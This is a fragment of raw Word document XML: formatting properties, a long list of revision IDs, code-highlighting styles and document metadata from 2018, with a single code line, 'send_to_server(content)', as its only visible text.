          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>send_to_server(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3D2FC" w14:textId="77777777" w:rsidR="003660CA" w:rsidRPr="00981F38" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003660CA" w:rsidRPr="00981F38"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B2E40B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8F051CA"/>
    <w:lvl w:ilvl="0" w:tplc="A6A81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419"/>
    <w:rsid w:val="00001A20"/>
    <w:rsid w:val="00023472"/>
    <w:rsid w:val="00055FD0"/>
    <w:rsid w:val="00057A2B"/>
    <w:rsid w:val="00061ABB"/>
    <w:rsid w:val="00065CDF"/>
    <w:rsid w:val="00073522"/>
    <w:rsid w:val="00073E96"/>
    <w:rsid w:val="00075BF8"/>
    <w:rsid w:val="00090BC5"/>
    <w:rsid w:val="00091EEF"/>
    <w:rsid w:val="0009496B"/>
    <w:rsid w:val="00094B3D"/>
    <w:rsid w:val="000B4305"/>
    <w:rsid w:val="000B55C9"/>
    <w:rsid w:val="000D3BE4"/>
    <w:rsid w:val="000E044C"/>
    <w:rsid w:val="000E098D"/>
    <w:rsid w:val="000F3C07"/>
    <w:rsid w:val="0014440E"/>
    <w:rsid w:val="001543CE"/>
    <w:rsid w:val="00163BF7"/>
    <w:rsid w:val="00172288"/>
    <w:rsid w:val="00195CF4"/>
    <w:rsid w:val="001A0672"/>
    <w:rsid w:val="001A0792"/>
    <w:rsid w:val="001A21AF"/>
    <w:rsid w:val="001A45A4"/>
    <w:rsid w:val="001C2466"/>
    <w:rsid w:val="001D166B"/>
    <w:rsid w:val="001E1762"/>
    <w:rsid w:val="001E71C8"/>
    <w:rsid w:val="001F1DD9"/>
    <w:rsid w:val="0021758B"/>
    <w:rsid w:val="00217884"/>
    <w:rsid w:val="002265F9"/>
    <w:rsid w:val="002370D8"/>
    <w:rsid w:val="00252CAE"/>
    <w:rsid w:val="00280B16"/>
    <w:rsid w:val="00291932"/>
    <w:rsid w:val="002A598D"/>
    <w:rsid w:val="002B0FFD"/>
    <w:rsid w:val="002B2B13"/>
    <w:rsid w:val="002B5445"/>
    <w:rsid w:val="002C0FCC"/>
    <w:rsid w:val="002C2648"/>
    <w:rsid w:val="002C7096"/>
    <w:rsid w:val="002D466B"/>
    <w:rsid w:val="002D4869"/>
    <w:rsid w:val="002E71C7"/>
    <w:rsid w:val="00301CC2"/>
    <w:rsid w:val="00302059"/>
    <w:rsid w:val="00307306"/>
    <w:rsid w:val="00323D8A"/>
    <w:rsid w:val="003378D0"/>
    <w:rsid w:val="00341D5E"/>
    <w:rsid w:val="00342D38"/>
    <w:rsid w:val="00363EC8"/>
    <w:rsid w:val="003660CA"/>
    <w:rsid w:val="00366598"/>
    <w:rsid w:val="00372840"/>
    <w:rsid w:val="003731E3"/>
    <w:rsid w:val="003807EC"/>
    <w:rsid w:val="00387419"/>
    <w:rsid w:val="003B022C"/>
    <w:rsid w:val="003B1103"/>
    <w:rsid w:val="003C4C67"/>
    <w:rsid w:val="003C51F2"/>
    <w:rsid w:val="003C7CC0"/>
    <w:rsid w:val="003D290D"/>
    <w:rsid w:val="003E4798"/>
    <w:rsid w:val="00424886"/>
    <w:rsid w:val="00436187"/>
    <w:rsid w:val="00460FA2"/>
    <w:rsid w:val="00476FE1"/>
    <w:rsid w:val="004813F5"/>
    <w:rsid w:val="00486582"/>
    <w:rsid w:val="00497741"/>
    <w:rsid w:val="004A69BE"/>
    <w:rsid w:val="004C0463"/>
    <w:rsid w:val="004E06E1"/>
    <w:rsid w:val="004E0E25"/>
    <w:rsid w:val="004E4297"/>
    <w:rsid w:val="004F1729"/>
    <w:rsid w:val="005210CA"/>
    <w:rsid w:val="0054574D"/>
    <w:rsid w:val="005502FD"/>
    <w:rsid w:val="00560371"/>
    <w:rsid w:val="00565A77"/>
    <w:rsid w:val="00571015"/>
    <w:rsid w:val="00571A2E"/>
    <w:rsid w:val="00584926"/>
    <w:rsid w:val="00594152"/>
    <w:rsid w:val="005A5BA6"/>
    <w:rsid w:val="005B42D1"/>
    <w:rsid w:val="005D2AFE"/>
    <w:rsid w:val="005E47EC"/>
    <w:rsid w:val="005E52FB"/>
    <w:rsid w:val="005F54BB"/>
    <w:rsid w:val="00611C8F"/>
    <w:rsid w:val="00617F92"/>
    <w:rsid w:val="00665A29"/>
    <w:rsid w:val="00676DA4"/>
    <w:rsid w:val="00685DFF"/>
    <w:rsid w:val="00695887"/>
    <w:rsid w:val="006A76A9"/>
    <w:rsid w:val="006B5BE8"/>
    <w:rsid w:val="006B79E4"/>
    <w:rsid w:val="006C3D5F"/>
    <w:rsid w:val="006D01AF"/>
    <w:rsid w:val="006E5BD5"/>
    <w:rsid w:val="006F3E6B"/>
    <w:rsid w:val="00710BBD"/>
    <w:rsid w:val="0073639A"/>
    <w:rsid w:val="00736609"/>
    <w:rsid w:val="0075222F"/>
    <w:rsid w:val="00766C16"/>
    <w:rsid w:val="00771CC3"/>
    <w:rsid w:val="00790AFC"/>
    <w:rsid w:val="007A76D2"/>
    <w:rsid w:val="007B2BEC"/>
    <w:rsid w:val="007B64CD"/>
    <w:rsid w:val="007C7965"/>
    <w:rsid w:val="00802E8A"/>
    <w:rsid w:val="0080352C"/>
    <w:rsid w:val="00810A0E"/>
    <w:rsid w:val="00842054"/>
    <w:rsid w:val="00861C7B"/>
    <w:rsid w:val="00867126"/>
    <w:rsid w:val="0087612A"/>
    <w:rsid w:val="00882862"/>
    <w:rsid w:val="00890B6F"/>
    <w:rsid w:val="00891671"/>
    <w:rsid w:val="00896BE5"/>
    <w:rsid w:val="008A6839"/>
    <w:rsid w:val="008B02D8"/>
    <w:rsid w:val="008B6B2F"/>
    <w:rsid w:val="008D1245"/>
    <w:rsid w:val="008E5804"/>
    <w:rsid w:val="008F4C95"/>
    <w:rsid w:val="008F58A2"/>
    <w:rsid w:val="00924208"/>
    <w:rsid w:val="00930007"/>
    <w:rsid w:val="009319D0"/>
    <w:rsid w:val="00936FC2"/>
    <w:rsid w:val="00940831"/>
    <w:rsid w:val="00943801"/>
    <w:rsid w:val="00943CB0"/>
    <w:rsid w:val="00957C14"/>
    <w:rsid w:val="00962D25"/>
    <w:rsid w:val="0096326D"/>
    <w:rsid w:val="00966D41"/>
    <w:rsid w:val="0096719E"/>
    <w:rsid w:val="00975DDF"/>
    <w:rsid w:val="00981F38"/>
    <w:rsid w:val="00982A55"/>
    <w:rsid w:val="00990931"/>
    <w:rsid w:val="009A1930"/>
    <w:rsid w:val="009C60EF"/>
    <w:rsid w:val="00A001CE"/>
    <w:rsid w:val="00A00967"/>
    <w:rsid w:val="00A00C1F"/>
    <w:rsid w:val="00A010BF"/>
    <w:rsid w:val="00A14D2C"/>
    <w:rsid w:val="00A16AE0"/>
    <w:rsid w:val="00A20AC4"/>
    <w:rsid w:val="00A219CD"/>
    <w:rsid w:val="00A21D35"/>
    <w:rsid w:val="00A2539E"/>
    <w:rsid w:val="00A254A4"/>
    <w:rsid w:val="00A33FE7"/>
    <w:rsid w:val="00A375DC"/>
    <w:rsid w:val="00A40653"/>
    <w:rsid w:val="00A43058"/>
    <w:rsid w:val="00A5447A"/>
    <w:rsid w:val="00A66D10"/>
    <w:rsid w:val="00A72EBE"/>
    <w:rsid w:val="00A76DBC"/>
    <w:rsid w:val="00A80A59"/>
    <w:rsid w:val="00A82D9D"/>
    <w:rsid w:val="00A9563D"/>
    <w:rsid w:val="00AA4C12"/>
    <w:rsid w:val="00AD1FE0"/>
    <w:rsid w:val="00AD7488"/>
    <w:rsid w:val="00AE257B"/>
    <w:rsid w:val="00AE6060"/>
    <w:rsid w:val="00AF29F8"/>
    <w:rsid w:val="00AF6316"/>
    <w:rsid w:val="00B13178"/>
    <w:rsid w:val="00B15A3A"/>
    <w:rsid w:val="00B16DAC"/>
    <w:rsid w:val="00B51D38"/>
    <w:rsid w:val="00B6487E"/>
    <w:rsid w:val="00B80411"/>
    <w:rsid w:val="00B81A66"/>
    <w:rsid w:val="00B90244"/>
    <w:rsid w:val="00B97693"/>
    <w:rsid w:val="00BA7FBA"/>
    <w:rsid w:val="00BB50DE"/>
    <w:rsid w:val="00BC3E5B"/>
    <w:rsid w:val="00BC7B1D"/>
    <w:rsid w:val="00BD700F"/>
    <w:rsid w:val="00BE231D"/>
    <w:rsid w:val="00BE5BAD"/>
    <w:rsid w:val="00C067F9"/>
    <w:rsid w:val="00C13151"/>
    <w:rsid w:val="00C144B4"/>
    <w:rsid w:val="00C200F9"/>
    <w:rsid w:val="00C22230"/>
    <w:rsid w:val="00C249ED"/>
    <w:rsid w:val="00C261D1"/>
    <w:rsid w:val="00C3008B"/>
    <w:rsid w:val="00C432A0"/>
    <w:rsid w:val="00C679E4"/>
    <w:rsid w:val="00C72C96"/>
    <w:rsid w:val="00C84416"/>
    <w:rsid w:val="00C8588F"/>
    <w:rsid w:val="00CC5985"/>
    <w:rsid w:val="00CC5DB5"/>
    <w:rsid w:val="00CD136C"/>
    <w:rsid w:val="00CF110C"/>
    <w:rsid w:val="00D14E36"/>
    <w:rsid w:val="00D15A14"/>
    <w:rsid w:val="00D35409"/>
    <w:rsid w:val="00D4765D"/>
    <w:rsid w:val="00D525E5"/>
    <w:rsid w:val="00D8211B"/>
    <w:rsid w:val="00D9201D"/>
    <w:rsid w:val="00DA1A82"/>
    <w:rsid w:val="00DA2458"/>
    <w:rsid w:val="00DB0AB1"/>
    <w:rsid w:val="00DF0BEF"/>
    <w:rsid w:val="00DF0DEA"/>
    <w:rsid w:val="00DF29E0"/>
    <w:rsid w:val="00E01CAB"/>
    <w:rsid w:val="00E31857"/>
    <w:rsid w:val="00E54770"/>
    <w:rsid w:val="00E6290D"/>
    <w:rsid w:val="00E80738"/>
    <w:rsid w:val="00E84BA1"/>
    <w:rsid w:val="00EA4F58"/>
    <w:rsid w:val="00EB0ACE"/>
    <w:rsid w:val="00EB22FE"/>
    <w:rsid w:val="00EC3907"/>
    <w:rsid w:val="00EE0FE8"/>
    <w:rsid w:val="00EF3CF4"/>
    <w:rsid w:val="00EF61A5"/>
    <w:rsid w:val="00F15961"/>
    <w:rsid w:val="00F20319"/>
    <w:rsid w:val="00F21D1F"/>
    <w:rsid w:val="00F31C6F"/>
    <w:rsid w:val="00F401BE"/>
    <w:rsid w:val="00F72677"/>
    <w:rsid w:val="00F76A7C"/>
    <w:rsid w:val="00F9319E"/>
    <w:rsid w:val="00F93909"/>
    <w:rsid w:val="00FA057C"/>
    <w:rsid w:val="00FA2DA6"/>
    <w:rsid w:val="00FA7CE6"/>
    <w:rsid w:val="00FC09F6"/>
    <w:rsid w:val="00FC5B3A"/>
    <w:rsid w:val="00FC611B"/>
    <w:rsid w:val="00FD13CE"/>
    <w:rsid w:val="00FE20EA"/>
    <w:rsid w:val="00FE4E3A"/>
    <w:rsid w:val="00FF5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FDD1F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74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23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23D8A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00323D8A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00323D8A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00323D8A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00323D8A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008F58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932854">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="406000047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="785202079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1320694928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20456728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fontTable" Target="fontTable.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589</TotalTime>
  <Pages>22</Pages>
  <Words>4428</Words>
  <Characters>25245</Characters>
  <Application>Microsoft Macintosh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190</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-12T23:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T17:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>